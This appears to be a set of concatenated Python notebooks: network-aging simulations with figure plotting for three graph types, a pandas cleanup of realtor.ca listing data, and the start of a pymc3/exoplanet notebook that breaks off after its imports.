tsvin = csv.reader(tsvin, delimiter=',')
row_list = list(tsvin)
T1_list = [float(i) for i in row_list[1]]
T2_list = [float(i) for i in row_list[2]]
# Select the T curve to fit over
#T_list_h = T2_list
T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
plt.scatter(T1_list, new_prm_list, color=colors[1], marker=markers[1], alpha=transparencies[1], s=30, edgecolors='none', label='$I=0.05$') # 0.05
T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
plt.scatter(T2_list, new_prm_list, color=colors[1], marker=markers[1], alpha=transparencies[1], s=30, edgecolors='none')#, label='$I=0.05$') # 0.05
for n, filename in enumerate(filelist1):
# open and read file data
input_file_path = './Nonlinear/' + filename + '.csv'
with open(input_file_path, 'rt') as tsvin:
tsvin = csv.reader(tsvin, delimiter=',')
row_list = list(tsvin)
T1_list = [float(i) for i in row_list[1]]
T2_list = [float(i) for i in row_list[2]]
# Select the T curve to fit over
#T_list_d = T2_list
T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
plt.scatter(T1_list, new_prm_list, color=colors[0], marker=markers[0], alpha=transparencies[0], s=30, edgecolors='none', label='$I=0.00$') # 0
T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
plt.scatter(T2_list, new_prm_list, color=colors[0], marker=markers[0], alpha=transparencies[0], s=30, edgecolors='none')#, label='$I=0.00$') # 0
# Read in numerical results and plot
I_thresh = 0.2
def extract(raw_string, start_marker, end_marker):
start = raw_string.index(start_marker) + len(start_marker)
end = raw_string.index(end_marker, start)
return (raw_string[start:end])
alpha_list = []
T1_dict= {}
T2_dict = {}
dirs = [x[0] for x in os.walk('./TOMLAB_data/alpha/')]
dirs = dirs[1:]
for d_idx, d in enumerate(dirs):
files = [f for f in os.listdir(d)]
for f_idx, f in enumerate(files):
if 'nonlin_alpha_' in f:
# Extract alpha value
alpha = float(extract(d+'/'+f,'alpha_','.csv'))
alpha_list.append(alpha)
# Read I, T1, T2
results_mat = np.genfromtxt(d+'/'+f,delimiter=',')
I_vals = results_mat[0,:]
T1_list = results_mat[1,:]
T2_list = results_mat[2,:]
for i, I in enumerate(I_vals):
if I < I_thresh:
if str(I) not in T1_dict:
T1_dict[str(I)] = []
T2_dict[str(I)] = []
if d_idx == 0:
T1_dict[str(I)].append(T1_list[i])
T2_dict[str(I)].append(T2_list[i])
else:
T1_dict[str(I)][f_idx] += T1_list[i]
T2_dict[str(I)][f_idx] += T2_list[i]
k = 0
for i, I in enumerate(I_vals[::-1]):
norm = 1/len(dirs)
if I in [0., 0.05, 0.1, 0.15, 0.2]:
if I < I_thresh:
sorted_T1_lists = [list(x) for x in zip(*sorted(zip(alpha_list, T1_dict[str(I)]), key=lambda pair: pair[0]))]
sorted_alpha_list = sorted_T1_lists[0]
sorted_T1_list = sorted_T1_lists[1]
sorted_T2_lists = [list(x) for x in zip(*sorted(zip(alpha_list, T2_dict[str(I)]), key=lambda pair: pair[0]))]
sorted_T2_list = sorted_T2_lists[1]
norm_T1 = norm*np.array(sorted_T1_list)
norm_T2 = norm*np.array(sorted_T2_list)
# Smoothen with SG filter
norm_T1 = savgol_filter(norm_T1, 11, 2)
norm_T2 = savgol_filter(norm_T2, 11, 2)
if colors[::-1][k] == 'k':
plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)#, linestyle='--')
plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)#, linestyle='--')
elif colors[::-1][k] == '#000080':
plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)
plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)
else:
plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], linewidth=2.5)#, linestyle='--')
plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], linewidth=2.5)#, linestyle='--')
# shading
if I == 0:
plt.fill_betweenx(sorted_alpha_list, norm_T1, norm_T2, color='#000080', alpha=0.05)
k+=1
#plt.scatter(parameter_list/2.5, T_list_g, color='magenta') # 0.25
plt.xlabel('Switching Times, $t$', fontsize=14)
plt.ylabel('Cost of repair, '+r'$\alpha$', fontsize=14)
plt.tick_params(axis='both', which='major', labelsize=12)
plt.tick_params(axis='both', which='minor', labelsize=12)
plt.xlim(0,100)
plt.ylim(1,18)
#plt.legend(loc='upper right')
plt.legend(loc='lower center', fontsize=14, borderaxespad=0.5)
plt.tight_layout()
plt.savefig('Nonlinear_ER.png', dpi=800)
plt.show()
# -
# ## Barabasi-Albert scale-free network
# ### Figure S4b: Vitality $\phi(t)$ as a function of time in an interdependent network compared to the linear theory
simPopulation('BA_final', pop_size=50, N=1000, p=0.1, d=0, f=0.025, r=0, f_thresh=0.01,
graph_type='scale_free_s', weight_type='uniform', check_type='none', kinetic=1, P_check=1, e=0, cost_type=['healthspan_quadratic', 8000],
costC=0.1, costR=1, costE=0.5, costD=0.5, costL=1, P_repl=0, costrepl=1, max_repl=1, repl_type='constant',
node_type='binary', damage_type='uniform', edge_type='binary', f_edge=0, r_edge=0, std=0.3,
P_ablate=0,costablate=1,ablate_type='constant',repair_start=0,repair_end=100,delay=0,time_end=100,dependency=0.5,save='yes',write_inds='yes')
# +
f=0.025
r=0
alpha=10
phi0 = 1
I_list = [0.5]
n = round(0.1*(999))
t = np.linspace(0, 100, 101)
simulated_vits = []
for fn in os.listdir('./Data/'):
if 'BA_final' in fn:
if 'MEAN' in fn:
mean_vit = np.genfromtxt('./Data/'+fn,delimiter=',')
else:
simulated_vits.append(np.genfromtxt('./Data/'+fn,delimiter=',')[0,:])
for i, vit in enumerate(simulated_vits):
if i == 0:
plt.plot(np.arange(0,len(vit),1), vit, color='g', alpha=0.1)#, label='Simulated')
else:
plt.plot(np.arange(0,len(vit),1), vit, color='g', alpha=0.1)
plt.plot(np.arange(0,len(mean_vit[0,:]),1), mean_vit[0,:],linewidth=2.5,color='g',label='Simulated')
# Plot
r=0
vitality_theory = [(np.exp((-f-r)*(time-1))*(f+np.exp((f+r)*(time-1))*r))/(f+r) for time in t]
plt.plot([time-1 for time in t], vitality_theory, color='m', linestyle='--', alpha=0.5, linewidth=2.0, label='Linear Theory')
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.xlabel("Time, $t$", fontsize=16)
plt.ylabel("Vitality, $\phi$", fontsize=16)
plt.ylim([-0.05,1.05])
plt.xlim([-0.05, 30])
plt.legend(loc='lower left',fontsize=14)
plt.tight_layout()
filename = 'BA_final'
plt.savefig('Figures/'+filename+'_vitality', dpi=800)
plt.show()
# -
# ### Figure S4e: Nonlinear optimal control for different costs of repair $\alpha$
# +
from scipy.signal import savgol_filter
colors = ['#000080', '#FFA500', 'm', 'k', '#FFC0CB']
markers = ['o', '^', 's', 'D', '*']
transparencies = [0.6, 0.6, 0.4, 0.5, 1.0]
filelist2=['Barabasi_Albert/0.1/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist3=['Barabasi_Albert/0.15/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist1=['Barabasi_Albert/0/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
filelist5=['Barabasi_Albert/0.05/ParamCurvesData/varya_f0.025_r0.01_a19.6_T100_step1_d0_depoff_N1000']
f = 0.025
alpha=10
T = 100
parameter_list = np.arange(0,20,0.4)
def bin_data (x, y, n):
'''
x = array of x-value lists
y = array of y-value lists
n = number of points that each binned average will contain
'''
k = 0
new_x = []
new_y = []
running_avg_x = 0
running_avg_y = 0
while k < len(x):
if k%n == 0 and k>0:
new_x.append(running_avg_x)
new_y.append(running_avg_y)
running_avg_x = 0
running_avg_y = 0
running_avg_x += x[k]/n
running_avg_y += y[k]/n
k+= 1
return (new_x, new_y)
#plt.figure(figsize=(6,3))
plt.figure()
for n, filename in enumerate(filelist3):
# open and read file data
input_file_path = './Nonlinear/' + filename + '.csv'
with open(input_file_path, 'rt') as tsvin:
tsvin = csv.reader(tsvin, delimiter=',')
row_list = list(tsvin)
T1_list = [float(i) for i in row_list[1]]
T2_list = [float(i) for i in row_list[2]]
# Select the T curve to fit over
#T_list_f = T2_list
T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
plt.scatter(T1_list, new_prm_list, color=colors[3], marker=markers[3], alpha=transparencies[3], s=30, edgecolors='none', label='$I=0.15$') # 0.15
T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
plt.scatter(T2_list, new_prm_list, color=colors[3], marker=markers[3], alpha=transparencies[3], s=30, edgecolors='none')#, label='$I=0.15$') # 0.15
for n, filename in enumerate(filelist2):
# open and read file data
input_file_path = './Nonlinear/' + filename + '.csv'
with open(input_file_path, 'rt') as tsvin:
tsvin = csv.reader(tsvin, delimiter=',')
row_list = list(tsvin)
T1_list = [float(i) for i in row_list[1]]
T2_list = [float(i) for i in row_list[2]]
# Select the T curve to fit over
#T_list_e = T2_list
T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
plt.scatter(T1_list, new_prm_list, color=colors[2], marker=markers[2], alpha=transparencies[2], s=30, edgecolors='none', label='$I=0.10$') # 0.1
T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
plt.scatter(T2_list, new_prm_list, color=colors[2], marker=markers[2], alpha=transparencies[2], s=30, edgecolors='none')#, label='$I=0.10$') # 0.1
for n, filename in enumerate(filelist5):
# open and read file data
input_file_path = './Nonlinear/' + filename + '.csv'
with open(input_file_path, 'rt') as tsvin:
tsvin = csv.reader(tsvin, delimiter=',')
row_list = list(tsvin)
T1_list = [float(i) for i in row_list[1]]
T2_list = [float(i) for i in row_list[2]]
# Select the T curve to fit over
#T_list_h = T2_list
T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
plt.scatter(T1_list, new_prm_list, color=colors[1], marker=markers[1], alpha=transparencies[1], s=30, edgecolors='none', label='$I=0.05$') # 0.05
T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
plt.scatter(T2_list, new_prm_list, color=colors[1], marker=markers[1], alpha=transparencies[1], s=30, edgecolors='none')#, label='$I=0.05$') # 0.05
for n, filename in enumerate(filelist1):
# open and read file data
input_file_path = './Nonlinear/' + filename + '.csv'
with open(input_file_path, 'rt') as tsvin:
tsvin = csv.reader(tsvin, delimiter=',')
row_list = list(tsvin)
T1_list = [float(i) for i in row_list[1]]
T2_list = [float(i) for i in row_list[2]]
# Select the T curve to fit over
#T_list_d = T2_list
T1_list, new_prm_list = bin_data(T1_list, parameter_list, 3)
plt.scatter(T1_list, new_prm_list, color=colors[0], marker=markers[0], alpha=transparencies[0], s=30, edgecolors='none', label='$I=0.00$') # 0
T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
plt.scatter(T2_list, new_prm_list, color=colors[0], marker=markers[0], alpha=transparencies[0], s=30, edgecolors='none')#, label='$I=0.00$') # 0
# Read in numerical results and plot
I_thresh = 0.2
def extract(raw_string, start_marker, end_marker):
start = raw_string.index(start_marker) + len(start_marker)
end = raw_string.index(end_marker, start)
return (raw_string[start:end])
alpha_list = []
T1_dict= {}
T2_dict = {}
dirs = [x[0] for x in os.walk('./TOMLAB_data/alpha/')]
dirs = dirs[1:]
for d_idx, d in enumerate(dirs):
files = [f for f in os.listdir(d)]
for f_idx, f in enumerate(files):
if 'nonlin_alpha_' in f:
# Extract alpha value
alpha = float(extract(d+'/'+f,'alpha_','.csv'))
alpha_list.append(alpha)
# Read I, T1, T2
results_mat = np.genfromtxt(d+'/'+f,delimiter=',')
I_vals = results_mat[0,:]
T1_list = results_mat[1,:]
T2_list = results_mat[2,:]
for i, I in enumerate(I_vals):
if I < I_thresh:
if str(I) not in T1_dict:
T1_dict[str(I)] = []
T2_dict[str(I)] = []
if d_idx == 0:
T1_dict[str(I)].append(T1_list[i])
T2_dict[str(I)].append(T2_list[i])
else:
T1_dict[str(I)][f_idx] += T1_list[i]
T2_dict[str(I)][f_idx] += T2_list[i]
k = 0
for i, I in enumerate(I_vals[::-1]):
norm = 1/len(dirs)
if I in [0., 0.05, 0.1, 0.15, 0.2]:
if I < I_thresh:
sorted_T1_lists = [list(x) for x in zip(*sorted(zip(alpha_list, T1_dict[str(I)]), key=lambda pair: pair[0]))]
sorted_alpha_list = sorted_T1_lists[0]
sorted_T1_list = sorted_T1_lists[1]
sorted_T2_lists = [list(x) for x in zip(*sorted(zip(alpha_list, T2_dict[str(I)]), key=lambda pair: pair[0]))]
sorted_T2_list = sorted_T2_lists[1]
norm_T1 = norm*np.array(sorted_T1_list)
norm_T2 = norm*np.array(sorted_T2_list)
# Smoothen with SG filter
norm_T1 = savgol_filter(norm_T1, 11, 2)
norm_T2 = savgol_filter(norm_T2, 11, 2)
if colors[::-1][k] == 'k':
plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)#, linestyle='--')
plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)#, linestyle='--')
elif colors[::-1][k] == '#000080':
plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)
plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)
else:
plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], linewidth=2.5)#, linestyle='--')
plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], linewidth=2.5)#, linestyle='--')
# shading
if I == 0:
plt.fill_betweenx(sorted_alpha_list, norm_T1, norm_T2, color='#000080', alpha=0.05)
k+=1
#plt.scatter(parameter_list/2.5, T_list_g, color='magenta') # 0.25
plt.xlabel('Switching Times, $t$', fontsize=14)
plt.ylabel('Cost of repair, '+r'$\alpha$', fontsize=14)
plt.tick_params(axis='both', which='major', labelsize=12)
plt.tick_params(axis='both', which='minor', labelsize=12)
plt.xlim(0,100)
plt.ylim(1,18)
#plt.legend(loc='upper right')
plt.legend(loc='lower center', fontsize=14, borderaxespad=0.5)
plt.tight_layout()
plt.savefig('Nonlinear_BA.png', dpi=800)
plt.show()
# -
# ## Figure S4c: Critical failure time $t_c$ as a function of $I$ for the three network structures
# +
######
alpha = 10
r = 0
f = 0.025
N = 100
p = 0.1
graph_type = 'Grandom_s'
######
d=0
f_thresh=0.1
weight_type='uniform'
check_type='none'
kinetic=1
P_check=0.01
e=0
cost_type=['basic']
costC=0
costR=0
costE=0
costD=0
costL=0,
P_repl=0
costrepl=0
max_repl=1
repl_type='constant'
node_type='binary'
damage_type='uniform'
edge_type='binary'
f_edge=0
r_edge=0
std=0.3,
P_ablate=0
costablate=0
ablate_type='constant'
repair_start=0
repair_end='none'
delay=0,
time_end='none'
save='no'
plot='yes'
write_inds='no'
I_list = np.linspace(0.05,1,30)
t_c_list = []
sigma_t_list = []
for dependency in I_list:
phi_c_I_list = []
t_c_I_list = []
for ind in range(200):
A, v = initIndividual (N, graph_type, p, d, edge_type)
# Initialize vector for number of nodes that the given is dependent on
num_neigh = np.sum(A,axis=0)
# Initialize replication counter vector
repl_v = np.zeros(N)
# Summary Lists
vitality = []
h_fraction = []
m_fraction = []
i = 0
while i >= 0: # runs until all nodes broken
# Gets weight and degree vectors
degree_vec = getDegrees (A)
weight_vec = getWeights (weight_type, A, v, degree_vec)
vitality_i, interdependence_i = Analyze(v, f, r, i, weight_vec)
vitality.append(vitality_i)
# Break if vitality lower than threshold
if np.sum(v)/len(v) <= f_thresh or np.sum(v)==0: # stops when vitality passes threshold
break
# Stops data collection if time_end reaches
if time_end != 'none' and i >= time_end:
break
# simulate stochastic damage
A, v, f = Damage(A, v, f, damage_type, node_type, edge_type, f_edge, std, i)
# Check and repair network
if i >= repair_start:
if repair_end != 'none':
if i <= int(repair_end):
cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
node_type, edge_type, r_edge, std)
cost_r = r
else:
cost_cr = 0
cost_r = 0
else:
cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
node_type, edge_type, r_edge, std)
cost_r = r
else:
cost_cr = 0
cost_r = 0
# dependency-related failure
if dependency > 0:
v = dependencyFail(A, v, num_neigh, dependency, equilibrate_failures=True)
i += 1
# Calculate phi_c using phi=0.05
for idx in range(len(vitality)):
if vitality[idx] <= 0.1:
crit_idx = idx
break
elif idx == len(vitality)-1:
crit_idx = idx
t_c_I_list.append(crit_idx-4)
sigma_t_list.append(np.std(np.array(t_c_I_list)))
t_c_list.append(np.average(np.array(t_c_I_list)))
np.savetxt('t_c_sigma_gil.csv', np.vstack((I_list, sigma_t_list)), delimiter=',')
np.savetxt('t_c_dist_gil.csv', np.vstack((I_list,t_c_list)), delimiter=',')
# +
######
alpha = 10
r = 0
f = 0.025
N = 100
p = 0.1
graph_type = 'ERrandom_s'
######
d=0
f_thresh=0.1
weight_type='uniform'
check_type='none'
kinetic=1
P_check=0.01
e=0
cost_type=['basic']
costC=0
costR=0
costE=0
costD=0
costL=0,
P_repl=0
costrepl=0
max_repl=1
repl_type='constant'
node_type='binary'
damage_type='uniform'
edge_type='binary'
f_edge=0
r_edge=0
std=0.3,
P_ablate=0
costablate=0
ablate_type='constant'
repair_start=0
repair_end='none'
delay=0,
time_end='none'
save='no'
plot='yes'
write_inds='no'
I_list = np.linspace(0.05,1,30)
t_c_list = []
sigma_t_list = []
for dependency in I_list:
phi_c_I_list = []
t_c_I_list = []
for ind in range(200):
A, v = initIndividual (N, graph_type, p, d, edge_type)
# Initialize vector for number of nodes that the given is dependent on
num_neigh = np.sum(A,axis=0)
# Initialize replication counter vector
repl_v = np.zeros(N)
# Summary Lists
vitality = []
h_fraction = []
m_fraction = []
i = 0
while i >= 0: # runs until all nodes broken
# Gets weight and degree vectors
degree_vec = getDegrees (A)
weight_vec = getWeights (weight_type, A, v, degree_vec)
vitality_i, interdependence_i = Analyze(v, f, r, i, weight_vec)
vitality.append(vitality_i)
# Break if vitality lower than threshold
if np.sum(v)/len(v) <= f_thresh or np.sum(v)==0: # stops when vitality passes threshold
break
# Stops data collection if time_end reaches
if time_end != 'none' and i >= time_end:
break
# simulate stochastic damage
A, v, f = Damage(A, v, f, damage_type, node_type, edge_type, f_edge, std, i)
# Check and repair network
if i >= repair_start:
if repair_end != 'none':
if i <= int(repair_end):
cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
node_type, edge_type, r_edge, std)
cost_r = r
else:
cost_cr = 0
cost_r = 0
else:
cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
node_type, edge_type, r_edge, std)
cost_r = r
else:
cost_cr = 0
cost_r = 0
# dependency-related failure
if dependency > 0:
v = dependencyFail(A, v, num_neigh, dependency, equilibrate_failures=True)
i += 1
# Calculate phi_c using phi=0.05
for idx in range(len(vitality)):
if vitality[idx] <= 0.1:
crit_idx = idx
break
elif idx == len(vitality)-1:
crit_idx = idx
t_c_I_list.append(crit_idx-4)
sigma_t_list.append(np.std(np.array(t_c_I_list)))
t_c_list.append(np.average(np.array(t_c_I_list)))
np.savetxt('t_c_sigma_er.csv', np.vstack((I_list, sigma_t_list)), delimiter=',')
np.savetxt('t_c_dist_er.csv', np.vstack((I_list,t_c_list)), delimiter=',')
# +
######
alpha = 10
r = 0
f = 0.025
N = 100
p = 0.1
graph_type = 'scale_free_s'
######
d=0
f_thresh=0.1
weight_type='uniform'
check_type='none'
kinetic=1
P_check=0.01
e=0
cost_type=['basic']
costC=0
costR=0
costE=0
costD=0
costL=0,
P_repl=0
costrepl=0
max_repl=1
repl_type='constant'
node_type='binary'
damage_type='uniform'
edge_type='binary'
f_edge=0
r_edge=0
std=0.3,
P_ablate=0
costablate=0
ablate_type='constant'
repair_start=0
repair_end='none'
delay=0,
time_end='none'
save='no'
plot='yes'
write_inds='no'
I_list = np.linspace(0.05,1,30)
t_c_list = []
sigma_t_list = []
for dependency in I_list:
phi_c_I_list = []
t_c_I_list = []
for ind in range(200):
A, v = initIndividual (N, graph_type, p, d, edge_type)
# Initialize vector for number of nodes that the given is dependent on
num_neigh = np.sum(A,axis=0)
# Initialize replication counter vector
repl_v = np.zeros(N)
# Summary Lists
vitality = []
h_fraction = []
m_fraction = []
i = 0
while i >= 0: # runs until all nodes broken
# Gets weight and degree vectors
degree_vec = getDegrees (A)
weight_vec = getWeights (weight_type, A, v, degree_vec)
vitality_i, interdependence_i = Analyze(v, f, r, i, weight_vec)
vitality.append(vitality_i)
# Break if vitality lower than threshold
if np.sum(v)/len(v) <= f_thresh or np.sum(v)==0: # stops when vitality passes threshold
break
# Stops data collection if time_end reaches
if time_end != 'none' and i >= time_end:
break
# simulate stochastic damage
A, v, f = Damage(A, v, f, damage_type, node_type, edge_type, f_edge, std, i)
# Check and repair network
if i >= repair_start:
if repair_end != 'none':
if i <= int(repair_end):
cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
node_type, edge_type, r_edge, std)
cost_r = r
else:
cost_cr = 0
cost_r = 0
else:
cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
node_type, edge_type, r_edge, std)
cost_r = r
else:
cost_cr = 0
cost_r = 0
# dependency-related failure
if dependency > 0:
v = dependencyFail(A, v, num_neigh, dependency, equilibrate_failures=True)
i += 1
# Calculate phi_c using phi=0.05
for idx in range(len(vitality)):
if vitality[idx] <= 0.1:
crit_idx = idx
break
elif idx == len(vitality)-1:
crit_idx = idx
t_c_I_list.append(crit_idx-4)
sigma_t_list.append(np.std(np.array(t_c_I_list)))
t_c_list.append(np.average(np.array(t_c_I_list)))
np.savetxt('t_c_sigma_ba.csv', np.vstack((I_list, sigma_t_list)), delimiter=',')
np.savetxt('t_c_dist_ba.csv', np.vstack((I_list,t_c_list)), delimiter=',')
# +
gil = np.genfromtxt('t_c_sigma_gil.csv', delimiter=',')
gil2 = np.genfromtxt('t_c_dist_gil.csv', delimiter=',')
sig_gil = gil[1,:]
t_c_gil = gil2[1,:]
er = np.genfromtxt('t_c_sigma_er.csv', delimiter=',')
er2 = np.genfromtxt('t_c_dist_er.csv', delimiter=',')
t_c_er = er2[1,:]
sig_er = er[1,:]
ba = np.genfromtxt('t_c_sigma_ba.csv', delimiter=',')
ba2 = np.genfromtxt('t_c_dist_ba.csv', delimiter=',')
t_c_ba = ba2[1,:]
sig_ba = ba[1,:]
I_list = gil[0,:]
plt.figure(figsize=(10,4))
plt.scatter(I_list,t_c_gil, color='#000080', alpha=0.5, s=30, edgecolors='none',label='Gilbert')
plt.scatter(I_list,t_c_er, color='k', marker='^', alpha=0.3, s=30, edgecolors='none',label='Erdos-Renyi')
plt.scatter(I_list,t_c_ba, color='g', marker='s', alpha=0.6, s=30, edgecolors='none',label='Barabasi-Albert')
plt.plot(I_list,t_c_gil, color='#000080', alpha=0.7, linestyle='--')
plt.plot(I_list,t_c_er, color='k', alpha=0.7, linestyle='--')
plt.plot(I_list,t_c_ba, color='g', alpha=0.7, linestyle='--')
plt.fill_between(I_list, t_c_gil-sig_gil, t_c_gil+sig_gil,facecolor='#000080',alpha=0.02)
plt.fill_between(I_list, t_c_er-sig_er, t_c_er+sig_er,facecolor='k',alpha=0.02)
plt.fill_between(I_list, t_c_ba-sig_ba, t_c_ba+sig_ba,facecolor='g',alpha=0.04)
#plt.plot(I_list_anly,t_c_anly, 'k', alpha=0.5, label='Theoretical',linewidth=3.0,linestyle='--')
plt.xlabel('Interdependence, $I$', fontsize=15)
plt.ylabel('Critical time, $t_c$', fontsize=15)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.legend(loc='best',fontsize=15)
plt.xlim(0.05,0.9)
plt.ylim(0,80)
plt.tight_layout()
plt.savefig('t_c_dist.png',dpi=800,bbox_inches='tight')
plt.show()
# -
|
network_topology.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Cleaning data borrowed from a real-estate listing website
import pandas as pd
# +
DATA_PATH = "data/"
PATH_TO_APP_MEDIA_ROOT = "../app/media/"
display_max_output = True
if display_max_output:
pd.options.display.max_rows = 999
pd.options.display.max_columns = 999
# +
# This data is from a Canadian real estate listing website: realtor.ca
# I'm using this data for private and non-commercial use
# as per realtor.ca's Terms of Use Agreement: https://www.realtor.ca/terms-of-use
# To reproduce:
# Copy the network request to https://api2.realtor.ca/Listing.svc/PropertySearch_Post
# Update the `RecordsPerPage` value to be whatever you want.
# Note that this is not an official API.
realtor_api_response = pd.read_json(f"{DATA_PATH}realtor_ca_data.json", lines=True)
realtor_api_response
# -
results = realtor_api_response["Results"].explode("Results")
properties = pd.json_normalize(results)
properties
properties.columns
# ## Separate out Address Text
# Before: '100 Regina St. S. Unit# 100|Waterloo, Ontario N2J4P9'
# After: ['100 Regina St. S.', '100', 'Waterloo', 'Ontario', 'N2J4P9', 'Canada']
# +
# Separate out street address
split_address_text = (
properties["Property.Address.AddressText"]
.str.split("|")
)
properties["Property.Address.StreetAddress"] = (
split_address_text
.apply(lambda x: x[0].strip())
)
# +
# Separate out city
split_city_province = (
split_address_text.apply(lambda x: x[1])
.str.split(",")
)
properties["Property.Address.City"] = (
split_city_province.apply(lambda x: x[0].strip())
)
# +
# Separate out province
split_province_postal_code = (
split_city_province.apply(lambda x: x[1].strip())
.str.split(" ")
)
properties["Property.Address.Province"] = (
split_province_postal_code.apply(lambda x: x[0].strip())
)
# +
# Separate out unit number for street addresses with "Unit#"
properties["Property.Address.UnitNumber"] = ""
props_w_unit_num_mask = properties["Property.Address.StreetAddress"].str.contains(" Unit# ")
split_addresses = (
properties[props_w_unit_num_mask]["Property.Address.StreetAddress"]
.str.split(" Unit# ")
)
properties.loc[
props_w_unit_num_mask,
["Property.Address.UnitNumber"],
] = split_addresses.apply(lambda x: x[1].strip())
properties.loc[
props_w_unit_num_mask,
["Property.Address.StreetAddress"],
] = split_addresses.apply(lambda x: x[0].strip())
# +
# Separate out unit number for street addresses with "#__ -street_address"
props_w_unit_num_mask = properties["Property.Address.StreetAddress"].str[0] == "#"
split_addresses = (
properties[props_w_unit_num_mask]["Property.Address.StreetAddress"]
.str.split(" -")
)
properties.loc[
props_w_unit_num_mask,
["Property.Address.UnitNumber"],
] = split_addresses.apply(lambda x: x[0][1:].strip())
properties.loc[
props_w_unit_num_mask,
["Property.Address.StreetAddress"],
] = split_addresses.apply(lambda x: x[1].strip())
# -
# Clean up street address strings
properties["Property.Address.StreetAddress"] = (
properties["Property.Address.StreetAddress"]
.str.replace(" +", " ")
.str.title()
)
# Add Canada as country. Hard-coded because realtor.ca only operates in Canada.
properties["Property.Address.Country"] = "Canada"
properties.head()
# ## Clean up other columns
# Get the first photo in high res. It's all we need for now.
properties["Property.PhotoLink"] = (
properties["Property.Photo"]
.apply(
lambda x: x[0]["HighResPath"]
if isinstance(x, list) and x[0]
else ""
)
)
# Pre-pend realtor website to RelativeDetailsURL
properties["DetailsURL"] = (
"https://realtor.ca" + properties["RelativeDetailsURL"]
)
properties["Property.ParkingType"] = (
properties["Property.Parking"]
.apply(
lambda x: x[0]["Name"]
if isinstance(x, list) and x[0]
else ""
)
)
properties["DateAccessed"] = pd.to_datetime("2021-05-12")
# ## Export data
# +
cols_of_interest = [
"Property.Address.StreetAddress", "Property.Address.UnitNumber",
"Property.Address.City", "Property.Address.Province", "PostalCode",
"Property.Address.Country",
"Property.Address.Latitude", "Property.Address.Longitude",
"MlsNumber", "DateAccessed", "Property.PriceUnformattedValue",
"DetailsURL", "Building.SizeInterior",
"Building.Bedrooms", "Building.BathroomTotal",
"Building.StoriesTotal", "Building.UnitTotal",
"Land.SizeTotal", "Land.SizeFrontage",
"Property.PhotoLink",
"Property.Type", "Building.Type",
"Property.OwnershipType",
"Property.ParkingType", "Property.ParkingSpaceTotal",
"PublicRemarks",
# "Id", "Individual", "RelativeDetailsURL",
# "StatusId", "PhotoChangeDateUTC", "HasNewImageUpdate", "Distance",
# "RelativeURLEn", "RelativeURLFr",
# "Building.Ammenities", "Property.Price",
# "Property.Address.PermitShowAddress", "Property.Address.DisseminationArea",
# "Property.Photo", "Property.TypeId",
# "Property.AmmenitiesNearBy", "Property.ConvertedPrice",
# "Property.OwnershipTypeGroupIds", "Property.ParkingType",
# "Land.AccessType", "AlternateURL.VideoLink",
# "AlternateURL.PhotoLink", "AlternateURL.BrochureLink",
# "Property.Address.AddressText", "Land.LandscapeFeatures",
# "AlternateURL.MapLink", "Building.SizeExterior",
# "AlternateURL.DetailsLink", "AlternateURL.SoundLink"
]
properties[cols_of_interest]
# -
properties[cols_of_interest].to_csv(f"{DATA_PATH}realtor_ca_cleaned_data.csv", index=False)
properties[cols_of_interest].to_csv(
f"{PATH_TO_APP_MEDIA_ROOT}realtor_ca_cleaned_data.csv",
index=False,
)
|
notebooks/clean_realtor_ca_data.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import matplotlib.pyplot as pl
# %matplotlib inline
import theano.tensor as tt
import pymc3 as pm
import exoplanet as xo
import specgp as sgp
red = '#FE4365'
blue = '#00A9FF'
yellow = '#ECA25C'
green = '#3F9778'
darkblue = '#005D7F'
colors = [red, green, blue, yellow, darkblue]
# +
with pm.Model() as model:
